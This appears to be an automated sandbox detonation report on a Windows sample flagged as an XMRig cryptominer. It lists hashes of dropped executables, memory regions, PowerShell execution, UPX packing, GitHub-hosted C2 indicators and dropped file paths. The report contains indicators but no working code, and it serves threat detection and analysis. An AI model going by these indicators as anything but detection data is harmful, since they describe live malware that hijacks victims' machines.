SHA256 c75b31e86c13e04ed24ad691c412b2c4e25676002b031f3f76688d3eac5aa68c
SHA512 0d9356a41814a07464ee9c2445411869060a7b1205bb3e77e1caa7abef0dd5d87657bef64ab0cc62b21a3a86839cb8faf16fdf8e1a556d8748cf96c3d7e86d08

memory/3004-35-0x000000013F4D0000-0x000000013F8C2000-memory.dmp

memory/2528-125-0x000000013FF20000-0x0000000140312000-memory.dmp

C:\Windows\system\WfNyiIg.exe

MD5 8cdab7066fd1da819b531f39ad1567c5
SHA1 1b0e0217a227d9933746ae80e5d76ca6e7fcbcfc
SHA256 15c4c655db256abcb9703e1e6440ecb13fb0e97ded45a94d65217805f595322b
SHA512 652a4e6b88f4dc3cb59876d589982a597db08d2f74bee7cf7853291ec42929cc21354993fe6420ce8d91c21562a568e3fc8f7712bae7df38f53a9ce7f5fffab5

memory/2784-138-0x0000000002340000-0x0000000002348000-memory.dmp

C:\Windows\system\yfpynUr.exe

MD5 c20534bb6251c9094500aa4e5ed42b68
SHA1 dd79d70ac475dfd9b57d56800c7dc36412f6a1b9
SHA256 5cc506fee3ff66d8722d5b43787eaef6218e9d5900d4bdfa1948f40dfbfb994a
SHA512 4b7c5cdc8b8bc7da19e5e9b5ba562377c7ff79976254b9d5d70f170e36389cc37a412bcf92891c412c028e165637f45ab1f6d68390ddf05aacea92b84426b26e

C:\Windows\system\DYNxzJK.exe

MD5 1092262be92245afb2cebd50f9d2db01
SHA1 61d8d4588519998f67633274f3bf6cdf5e793cf5
SHA256 ca8917b12048b5fbcb75276332b045a10e775af807f7dac20d21b4b4a40d8e4b
SHA512 947cc821cef58e407d47f72363181c2ee85712f649b11bc8ea4ac25694a67793709f5df91fbe613371cf4a0d92a6ddfbaf9d93333f54a7558c11581d25fe9009

C:\Windows\system\HThQyoT.exe

MD5 91305186d8e73ddca8c922b3d1a5df2d
SHA1 3cb0f29efb5a02576e6af555a08671c0b0f6f55c
SHA256 28f5266b6ef5bf6038ec95932fb6ce036a6bfe5debdf662179b99bf59c19343e
SHA512 004c0314fd292dafa9d7c4d5871d1b1c858f92c991c3c861d96965e28a26b2a35be1dfac3bf90a7f4618a689fbdfb6b06a69ea9a36a491c070a1b5adf863d784

C:\Windows\system\ayjxpqf.exe

MD5 2bd1454e0f218c327b2acc9a3a2454f9
SHA1 d774f208eb27c3b618ffebdc2025bdd39d1a55e0
SHA256 38388ee2da29e5c806c794ab6cd0d1f0a1614f2230f7d92dd95756160bbe8183
SHA512 504626953d10126ce420331dd9fa9442819ec550219f0a9b033313323ebbbecfdbf0423ecd24ae3ca99ec77e9eb1824d41b07b4fc17d7645c4261780b119a711

C:\Windows\system\onknRvH.exe

MD5 ecfdad4631fb8daa52b0a8bae4845a11
SHA1 07b9e95137f8166252f5fbc4417e0787694a43b8
SHA256 570d3a4e919351d46c9bdf4eb06456fddd2e902982c9e62b3631aa4f6a2e22bd
SHA512 09fd625fb30b1c895010764bb9b38d8d2b5ac61c63d5c01de2636c9a58d02c19a4d10be68f241548829d746dddb1cea1b8c53f6535cab595da53e707ceac9a7d

\Windows\system\BuCvjyN.exe

MD5 3f4a3af9188cbf7d29c796d7e9aad49a
SHA1 875c2631e3f750804fb82146e4f00cc84396f26f
SHA256 b5b0292dd7011eb3a0640a928a56f56076ee694a0a8e8a4761f116900e958f1c
SHA512 7d22380d80aad53a3c4d6a59b70e15d05e58a8d200f7d515d935a948181634815c02bf5e53092dedf8f8416c675d3fbeb15b33b3867ddd71964bbc9bc6f3379f

C:\Windows\system\yhJwsGc.exe

MD5 2503395dbb46ef81385f73687c8c8fb5
SHA1 81a9b8bbaf80e70c039d46beeeb8f4caa9f99c0c
SHA256 d721b1d3dc1f676e7c77434763c5e5cf24cccbc517b70d26456623b4b2303a27
SHA512 c49d0e200218b87370647f085e07720015ebf66e79e0f96a006c419c222e3015c4c02beeb08dddb4ad4ac5a0504d3caa9ba75cc4f40af15181a2c8cfacac166d

C:\Windows\system\njshNOE.exe

MD5 acff9d71a7940723c7449d74e9979d1d
SHA1 90cbd20031a617b6a86c2f3d2defc1307af6c753
SHA256 c2d262f15349f122df3e409a25f1865286c833d42bd2ba3b4c113b06ba73bffa
SHA512 f2a7d465d30b4738dee4be747a00c6ad40f8db157fadc3e322f0002a949afe515838e90eafed800a1f228c00ea027227bdd206ecb04032d4cf7f8400dfb5d310

C:\Windows\system\eVRYZnG.exe

MD5 18c0461c9f970d775607180612e52ade
SHA1 a57fe74d3ae2dfd2524ec31f2e973a132675ec6a
SHA256 3d857a0321335aff603dfb327b4362c4ae18dc135a0d3a8d310b2f8d42e4ec55
SHA512 e954ba285e585f29a25419004cfface72e097da30294728970aa49e8d8641e6471623fae395b293a682b8b31c641969e2b753f7f1a6cb65613228ff16dbc5b39

C:\Windows\system\ioHcfky.exe

MD5 0f3d26977e7cd9e9e50cd40efffe6853
SHA1 ab5248c32afd0f2edfe855fd9eb77062fec1dc45
SHA256 01ae8ab8bd22130cc0584254939ba8da457bc24431091e7ee5cbe7e90ca2b990
SHA512 f6eb6b097ede41701758e12d4355f45e6ba1eeb25443099a7f4b82f6ba0f89a5801304ebf4ef18a750fa4911eb47c55803c27bc3c9d542e043901722f2e925fb

C:\Windows\system\sxrCPjT.exe

MD5 e0d2f27e7b639ddcd5d0978f749fd011
SHA1 979be1202c5fade0cc136c8264637322964872a8
SHA256 4af318a2377575572dd7490e8c337788789218aeb6300985013b34f6b5c06db2
SHA512 52aa0020c62d11d84f290412595cbdb2adcccf98299b76999fc6656d6bbc874b6cd969077a2b92b61051720eb7d7b6f15e6d3f70a158378f171830f8a95f92a3

C:\Windows\system\FOEFUBv.exe

MD5 2f60c7993cd80d5a227eb17d58c7754d
SHA1 174c6e9bc1ca6c70e96648a65229a111a8ff66c2
SHA256 ae42d96ae8861e501455a4abd02bb56ebaa12e8409c53bd1f308e3e7ba281e79
SHA512 5246396268976afb7bcda1145742f3dd99550337552842d1d884c2453db5b118d028eb54e141d04c97c89ff39e8018cfba0ec9d71bf9b77be5c1eb64a3882d12

C:\Windows\system\hIcBbjX.exe

MD5 e294b79aeb4d28828efee172602dabcb
SHA1 29acee58da31327c619b813ea48b9bbbd65cb84e
SHA256 23580f94c58a89132d7b2724de470af09b2d97d0333ca1eab305560cb79c5c6c
SHA512 69436a77ea7fccd740ca7b9e1c7244ae5d3577a26d114c22b3921ad3f6e1ef30b5154097d3950a8367e7fdbb92d2bbea73091de188d251f35461ecc6f037d958

memory/3004-136-0x0000000003460000-0x0000000003852000-memory.dmp

C:\Windows\system\OALhLOE.exe

MD5 a303aa3772f926cb89cb64a582ce4e2e
SHA1 48c6993e364f4861dec9440184ceb3e95eab0144
SHA256 14028094bd0e6335e220e5d14ae15e7d82f8ea855e91ec126e55fd6701478fa6
SHA512 e13728c4e9e8315f9833181977b8f54ab3266b5851cce5c921b2f5d3f6150a90180d5d053c5228ea4f5fe4beb03f58aa0b76e91560e339ab141101d91b3554a5

memory/2964-132-0x000000013F040000-0x000000013F432000-memory.dmp

C:\Windows\system\osZTcHW.exe

MD5 643e1ceeb762febbf6ba0756c305d9cc
SHA1 1296c16795ca7d2893a358e80111327de0d504ac
SHA256 d5ad14d2a58fec32919033039cf12d882603ad8e167617b7a603ef4ca37c5e24
SHA512 7c6caad94957361755847e74745b65155a7bb3aaedc5d6c2c5c5b468e37ba8f9083e485e16f3cfcc7e38a197d92e318b61b278268f75751219d5d2f0031071ae

C:\Windows\system\kkRNIDH.exe

MD5 8e7ac5ba2d1f9deea676e08788130e63
SHA1 5d18370e9f7b2397178cd84681f2b428d5d1c3fe
SHA256 90c1240285eb038504acf2320a07ea1b5bef229ba8ed45fce591b1421059a786
SHA512 ecad8fec6907924457912213852482cb6618051302fc2821f25c548cfe574cb678bb07adef5a2125a3253c21ba4c72ec76508382dee2b0aa215232b6669b9ee7

C:\Windows\system\oJsrytP.exe

MD5 0d438772eab62a05c20f8060efb6f289
SHA1 5970b1ba4dbfcf14fe3964621364a5b7178f9263
SHA256 3e1a381634fd85ccf7ea96a0d7b397cefcca84629d448525164eab10b4b4d7a4
SHA512 29618117c692d8690867ba7d5318320494c155797094ce5401611020082118d75229918a543a1b93598448493c80264e0f354a56c350c50bc633a9b7d93681ba

memory/3004-117-0x0000000003460000-0x0000000003852000-memory.dmp

memory/584-95-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

C:\Windows\system\wpejEsJ.exe

MD5 1fc03464b4508392708a906d7de1fa4f
SHA1 fcd9ded1d2530dc53453ed5d351d0d07a7f63067
SHA256 a50e4a796cdad9db3f0299c3c18f09413751e0497567cbbd18005f3df5820db2
SHA512 db1db08bc63cbffbf757ca9dac854d3331156469dcfe447ce817a9a0eee30de7bb2caec3d8fb7c7fa02da5f81189bca0d22560b3d1c241968c0b8f8b3ee2dc5c

C:\Windows\system\QSflFyD.exe

MD5 0f6e2714dbf8eedcc554ea2f5736c44e
SHA1 6cf13d6bcbba3d51c4a1aab45eb03b75826b604c
SHA256 53995159930250d8823c1c9d9357bf8fb13c13794b6804883113b9d9b6a25751
SHA512 f0a936e2e0336b9f68d39c02139b148595786d18fd77914f1eddff32cc3e2af7e4df4b2fc882f8a689aa04dc5eeca2d16fba2d53137b863f09f0099f4f6339ed

C:\Windows\system\ZvvUIkk.exe

MD5 d9fd63f754669fd424c6ee0b6f0c8184
SHA1 5c1670fc58f11f717ab6ae2ab49c4696cf1b8dfe
SHA256 24875e538ad2f4f4abd2adec03a8e91c13f832e1eeb706bc4a275d495c1732f7
SHA512 4d11f4613461fdb2b4d5d1c3a2d3a43de85aa5ee1f9870a088de3da691efd0abb0838f4ee4dc7e4b7674299a3a7143e405834012ec462a2b5597be56ba19510e

memory/3004-82-0x0000000003460000-0x0000000003852000-memory.dmp

C:\Windows\system\QcpeRow.exe

MD5 e9796756379768876a153920d2f251bf
SHA1 dcd51cc88590d93b4f2acc94438df0c12880dead
SHA256 e133e7c760e3b0bd9e04a5ab6a16971c036cb0e06d9d90285ef975e62f5f9c65
SHA512 409148731b5db70fd84f9757c387d92267d540702487c99ee917d0c0a07d1ba13a88f89b740b61a36ebfe767703ce27a1008bfd77c529f7021e511336113adf1

memory/3004-80-0x000000013F040000-0x000000013F432000-memory.dmp

memory/2836-79-0x000000013F080000-0x000000013F472000-memory.dmp

memory/2784-78-0x000000001B7C0000-0x000000001BAA2000-memory.dmp

memory/3004-76-0x000000013F080000-0x000000013F472000-memory.dmp

memory/2508-75-0x000000013F640000-0x000000013FA32000-memory.dmp

memory/3004-72-0x000000013FF20000-0x0000000140312000-memory.dmp

memory/2580-71-0x000000013FF30000-0x0000000140322000-memory.dmp

C:\Windows\system\ywqOfnx.exe

MD5 f94f06e2790431139ddff0ae3c2194f8
SHA1 983d4f15fb8deca3bc4dd712103035cafa784b17
SHA256 ad4e04af54740701b6942f93e161ddf05d6bf66be1a1c58b2ba25a89eaffaacb
SHA512 024336b85ee9d0eb59ac9dac35ce732ea32a46ace4923bc73b6efbb3dcb9c224757cdb6490d7e61c7594684e54869509646cef2413772783c152cec0ca00faca

C:\Windows\system\wVwzWGE.exe

MD5 f1270cde57d081bdd0dc866ed51a0da1
SHA1 c03fef8e1229cfdbedbe1df2e1e17494108711af
SHA256 8bd9e6d200898f13662c78fd16b6f19a8399c6bf8aed8353053ee30ed169d73c
SHA512 8b7ee1a67be3dcee97c8357ef625966a142626604bca9c71917c95c6c885b146e2a8185affa560fa0d3b48a6cfb694a43c57bcbed1000e17a3c78110ea1c676b

memory/3004-63-0x0000000003460000-0x0000000003852000-memory.dmp

\Windows\system\qYoPpGV.exe

MD5 a2d414e8905b6cec8393a145b1b095d0
SHA1 21a5bbd3e943e7d2e133fb71a9d176ebb598ffc1
SHA256 8a27af9488e9aa01f52c412a009a0a32fd0dfaace5543983326b6a23e8aaffa2
SHA512 022f0065bd64dd78ccacf401b58b8e83eaa221aa89730563b080884b2ffd586a53e1f9aa1e42db09ef275df5b1e03669e394abc1b09a07c4568b641204660590

C:\Windows\system\uYVGRiR.exe

MD5 106b6bc0b17a58e6c4ca2adb44b98ca3
SHA1 ad89b871c5a528cf96ac16e869b5dc2a7604bc85
SHA256 51cc2d6314f22f5baa6ac0e8430ce76bef1822459af70a9a086ba36cb633ca69
SHA512 93469cbedac75d0cf0d7762af25ebaecae69570b0adedd584eb3d78c2341fdb03f4e1d500edae3e165ad92f9ed82517a4bf0443b0ad77ca781cd94023973d3c3

C:\Windows\system\aUlFtTb.exe

MD5 1e0b655a3f513d9ebf548b3ec89ff3f4
SHA1 efba2dc8d88d1d77853fc86a063418e926efffcc
SHA256 4a78117221b8a1ed0d761fe885f6f8e2578eb551c2e5a6d09e7a605253b14567
SHA512 0a56f13e106c024882b7b8f16ce59a26935071081d21f51816e09daa6fd85c6f89203f7935cec6340fbc049151e5c7c21890a5bd2d27e75d118a993f6498c7d7

memory/2692-37-0x000000013F4A0000-0x000000013F892000-memory.dmp

memory/848-36-0x000000013F4D0000-0x000000013F8C2000-memory.dmp

memory/2672-34-0x000000013FF10000-0x0000000140302000-memory.dmp

memory/2176-33-0x000000013FD40000-0x0000000140132000-memory.dmp

memory/3004-32-0x000000013F4A0000-0x000000013F892000-memory.dmp

memory/3004-31-0x000000013FF10000-0x0000000140302000-memory.dmp

memory/3004-29-0x0000000002C40000-0x0000000003032000-memory.dmp

C:\Windows\system\OaEkGuw.exe

MD5 7d2e84bb1806a1f27d3424ae7b2443ac
SHA1 ba71022e2c39858e7c05d008cdad823276fbeb0d
SHA256 4b60f7accc3383241df9f0bd3a82485a45ec46faecf318cc6c0ccd917b13296d
SHA512 60f1c80b88ea57802d3987c3cec120ee28c9c9d1f8d5298bdeffa5dcd70228fe98a9d421f1f64cb27579e7b55700a48a9249d0fb668585a67c68ebc5a6e2843b

C:\Windows\system\qerrWAq.exe

MD5 cfb85e6b3fdc60c0ca1da2cae5d670b2
SHA1 eb6db07a90dbedf1822e14c9889fa4f1c9a86d87
SHA256 cbaa9213ae7f95125100d078432455a0e7bb8535a854f181b120bd69e1d90c89
SHA512 1026b59ed04f8b1b47e02f9e1d8f07244a9887c0ad71c9798ba7eb53f86710d41ec259fd7487f0c90fbb312f324f2dbf752985bc303ecdd8d6eb08f47cf2af97

memory/2708-24-0x000000013FE80000-0x0000000140272000-memory.dmp

memory/3004-16-0x000000013FE80000-0x0000000140272000-memory.dmp

memory/2672-5395-0x000000013FF10000-0x0000000140302000-memory.dmp

memory/2964-5407-0x000000013F040000-0x000000013F432000-memory.dmp

memory/2508-5393-0x000000013F640000-0x000000013FA32000-memory.dmp

memory/848-5416-0x000000013F4D0000-0x000000013F8C2000-memory.dmp

memory/2580-5419-0x000000013FF30000-0x0000000140322000-memory.dmp

memory/2708-5427-0x000000013FE80000-0x0000000140272000-memory.dmp

memory/2836-5474-0x000000013F080000-0x000000013F472000-memory.dmp

memory/2176-5576-0x000000013FD40000-0x0000000140132000-memory.dmp

memory/2528-5608-0x000000013FF20000-0x0000000140312000-memory.dmp

memory/584-5498-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 20:02

Reported

2024-05-22 20:05

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\pXSoYZz.exe N/A
N/A N/A C:\Windows\System\vZkSTFH.exe N/A
N/A N/A C:\Windows\System\qBRtaYh.exe N/A
N/A N/A C:\Windows\System\OaEkGuw.exe N/A
N/A N/A C:\Windows\System\qerrWAq.exe N/A
N/A N/A C:\Windows\System\qYoPpGV.exe N/A
N/A N/A C:\Windows\System\aUlFtTb.exe N/A
N/A N/A C:\Windows\System\WfNyiIg.exe N/A
N/A N/A C:\Windows\System\uYVGRiR.exe N/A
N/A N/A C:\Windows\System\QcpeRow.exe N/A
N/A N/A C:\Windows\System\wVwzWGE.exe N/A
N/A N/A C:\Windows\System\osZTcHW.exe N/A
N/A N/A C:\Windows\System\QSflFyD.exe N/A
N/A N/A C:\Windows\System\hIcBbjX.exe N/A
N/A N/A C:\Windows\System\wpejEsJ.exe N/A
N/A N/A C:\Windows\System\FOEFUBv.exe N/A
N/A N/A C:\Windows\System\sxrCPjT.exe N/A
N/A N/A C:\Windows\System\oJsrytP.exe N/A
N/A N/A C:\Windows\System\kkRNIDH.exe N/A
N/A N/A C:\Windows\System\ioHcfky.exe N/A
N/A N/A C:\Windows\System\ywqOfnx.exe N/A
N/A N/A C:\Windows\System\OALhLOE.exe N/A
N/A N/A C:\Windows\System\eVRYZnG.exe N/A
N/A N/A C:\Windows\System\njshNOE.exe N/A
N/A N/A C:\Windows\System\BuCvjyN.exe N/A
N/A N/A C:\Windows\System\yhJwsGc.exe N/A
N/A N/A C:\Windows\System\onknRvH.exe N/A
N/A N/A C:\Windows\System\ayjxpqf.exe N/A
N/A N/A C:\Windows\System\HThQyoT.exe N/A
N/A N/A C:\Windows\System\DYNxzJK.exe N/A
N/A N/A C:\Windows\System\yfpynUr.exe N/A
N/A N/A C:\Windows\System\ZcOcYqB.exe N/A
N/A N/A C:\Windows\System\eWHziDz.exe N/A
N/A N/A C:\Windows\System\uLQqzMA.exe N/A
N/A N/A C:\Windows\System\BuyXkLY.exe N/A
N/A N/A C:\Windows\System\TkzhEyW.exe N/A
N/A N/A C:\Windows\System\FHcqNtk.exe N/A
N/A N/A C:\Windows\System\tyMgZVL.exe N/A
N/A N/A C:\Windows\System\wZDMmNI.exe N/A
N/A N/A C:\Windows\System\ZvvUIkk.exe N/A
N/A N/A C:\Windows\System\xKcwMjq.exe N/A
N/A N/A C:\Windows\System\cNrTNlQ.exe N/A
N/A N/A C:\Windows\System\FDrzNCv.exe N/A
N/A N/A C:\Windows\System\qtRDnhb.exe N/A
N/A N/A C:\Windows\System\TPwRdWY.exe N/A
N/A N/A C:\Windows\System\YvmTsDd.exe N/A
N/A N/A C:\Windows\System\qhMoLjq.exe N/A
N/A N/A C:\Windows\System\EBNmXNG.exe N/A
N/A N/A C:\Windows\System\CQdqjpb.exe N/A
N/A N/A C:\Windows\System\HlzymDa.exe N/A
N/A N/A C:\Windows\System\RyEbOmJ.exe N/A
N/A N/A C:\Windows\System\mwoSuOn.exe N/A
N/A N/A C:\Windows\System\Npsbsad.exe N/A
N/A N/A C:\Windows\System\pcLROOO.exe N/A
N/A N/A C:\Windows\System\zKeomja.exe N/A
N/A N/A C:\Windows\System\NvKDWaX.exe N/A
N/A N/A C:\Windows\System\ZPkfLut.exe N/A
N/A N/A C:\Windows\System\rUtPhvs.exe N/A
N/A N/A C:\Windows\System\Ispnnpr.exe N/A
N/A N/A C:\Windows\System\zfGbBaD.exe N/A
N/A N/A C:\Windows\System\RBopSjv.exe N/A
N/A N/A C:\Windows\System\msHQlOJ.exe N/A
N/A N/A C:\Windows\System\DFXvzPW.exe N/A
N/A N/A C:\Windows\System\cAfsQcJ.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\ZLiSrMt.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\JXZEWVa.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\umjnoVr.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\IVHGESJ.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\NNOCxdw.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\KRXwwlN.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\VoLEEWc.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\bPmOwpT.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\SvYxMUK.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\zjWPFcm.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\fAYntIL.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\pjhhwoH.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\RIlNhTr.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\MsQrwbP.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\XoSCQQb.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\CqgPvBX.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\nRrtaZx.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\wSAKBjO.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZEvuuRN.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\EbBObaN.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\mFPFYsE.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\cqSJlCt.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZFHThVQ.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZPkfLut.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\VctNkkX.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\oBDdpCS.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\MCsfjYv.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\vVaNjbP.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\zPcTqwG.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\rJGqftt.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\YyHHNgK.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\oHAoJnD.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\LoRFKui.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\WaffHLm.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\iMAbVzh.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\gMLimmo.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\LfrYxXx.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\kTHALxy.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\LznDYoo.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\wSMFhub.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\ethCAAw.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\IBItdjs.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\IZAjjBk.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\zFvxBqq.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\JFhpYBA.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\dDSRVVL.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\SbifpcX.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\ClYfzZt.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\ruGbNlW.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
